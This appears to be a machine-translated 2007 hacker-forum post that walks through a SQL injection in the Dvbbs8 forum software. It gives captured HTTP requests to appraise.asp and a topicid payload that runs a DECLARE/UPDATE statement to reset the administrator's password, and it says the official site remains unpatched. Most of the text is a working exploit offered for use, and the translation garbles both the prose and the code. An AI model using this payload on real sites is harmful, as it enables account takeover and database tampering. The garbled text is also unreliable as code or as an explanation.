========================================================== ==========================================
Original Chinese animation
Dvbbs8 Vulnerability
By allyesno [at] 77169.org
I have already assumed a dvbbs8 SQL:
Let's register a user and find a post at will. I broke it just now ....
Let's resend a post. Click to post comments and capture packets here
Post/dvbbs8/appraise. asp? Action = save HTTP/1.1
Accept: image/GIF, image/X-xbitmap, image/JPEG, image/pjpeg, application/X-Shockwave-flash ,*/*
Referer: http: // 192.168.1.91/dvbbs8/dispbbs. asp? Boardid = 1 & id = 2 & page = 1
Accept-language: ZH-CN
Content-Type: Application/X-WWW-form-urlencoded
Accept-encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;. Net CLR 1.1.4322)
HOST: 192.168.1.91
Content-Length: 91
Connection: keep-alive
Cache-control: No-Cache
COOKIE: dvforum = userid = 3 & usercookies = 0 & statuserid = 197615644 & userclass = % D0 % C2 % Ca % D6 % C9 % CF % C2 % B7 & username = allyesno & Password = v0qdt2f765u6x7j5 & userhidden = 2; w0802 = 3; rtime = 0; ltime = 1186473801000; w08_eid = 88452409-http % 3A // 192.168.1.91/dvbbs8/index. asp % 3 fboardid % 3d1; geturl = % 2fdvbbs8% 2 fpost % 5 fupload % 2 EASP % 3 fboardid % 3d1; aspsessionidaccrcqqq = disabled; dvbbs = cacgffcf; upnum = 0
Boardid = 1 & topicid = 2 & announceid = 2 & Atype = 0 & a1 = 0 & a2 = 0 & atitle = 11111 & acodestr = 0425 & acontent = test
OK, let's start
Let's make fun
Userpost is the number of posts posted by the user. Incorrect
Script Language = 'javascript '> <font face = "" size = 2>
P> Microsoft ole db provider for SQL Server </font> <font face = "" size = 2> Error
'80040e14' </font>
P>
Font face = "" size = 2> 1st rows: ';' There is a syntax error nearby. </Font>
P>
Font face = "" size = 2>/dvbbs8/INC/dv_clsmain.asp </font> <font face = "" siz
2>, row 1504 </font>
Let alone this one. In fact, we have successfully modified it!
Article: 100
Let's continue to modify it. In fact, this is the case. We need to solve a small program problem.
Topicid = dvbbs. checkstr (request. Form ("topicid "))
Public Function checkstr (STR)
If isnull (STR) then
Checkstr = ""
Exit Function
End if
STR = Replace (STR, CHR (0 ),"")
Checkstr = Replace (STR ,"'","''")
End Function
It is obvious that single quotes are filtered out .... Let's get through this.
Change the password. Now the admin password is admin888. Let's change it to 123456.
Declare @ A sysname
Select @ A = 0x3400390062006100350039006100620062006500350036006500300035003700
Update [dv_user] Set userpassword = @ A where userid = 1
The modification is successful !!! We changed him back.
% 3 bdeclare + @ A + sysname + select + @ A % login + update + DV % 5 Fuser + set + userpassword % 3d @ A + where + userid % 3d1
OK. This statement can also be executed.
156
Post/dvbbs8/appraise. asp? Action = save HTTP/1.1
Accept: image/GIF, image/X-xbitmap, image/JPEG, image/pjpeg, application/X-Shockwave-flash ,*/*
Referer: http: // 192.168.1.91/dvbbs8/dispbbs. asp? Boardid = 1 & id = 3 & page = 1
Accept-language: ZH-CN
Content-Type: Application/X-WWW-form-urlencoded
Accept-encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;. Net CLR 1.1.4322)
HOST: 192.168.1.91
Content-Length: 242
Connection: keep-alive
Cache-control: No-Cache
COOKIE: dvforum = userid = 3 & usercookies = 0 & statuserid = 197615644 & userclass = % C2 % db % CC % B3 % D3 % Ce % C3 % F1 & username = allyesno & Password = y1tgx4j886xtb846 & userhidden = 2; list = list1 = 1; w0802 = 5; rtime = 0; ltime = 1186474916718; w08_eid = 88452409-http % 3A // 192.168.1.91/dvbbs8/index. asp % 3 fboardid % 3d1; geturl = % 2fdvbbs8% 2 fpost % 5 fupload % 2 EASP % 3 fboardid % 3d1; aspsessionidaccrcqqq = disabled; dvbbs = cacgffcf; upnum = 0
Boardid = 1 & topicid = 3% 3 bdeclare + @ A + sysname + select + @ A % login + update + DV % 5 Fuser + set + userpassword % 3d @ A + where + userid % 3d1 & announceid = 3 & Atype = 0 & a1 = 0 & a2 = 0 & atitle = 22 & acodestr = 3297 & acontent = 33
No, it's changed to 123456.
Due to the severe vulnerabilities, please use them with caution. The official website has not been patched !!!!!!
========================================================== ================================= Huaxia Hacker Alliance ------
2007.8.7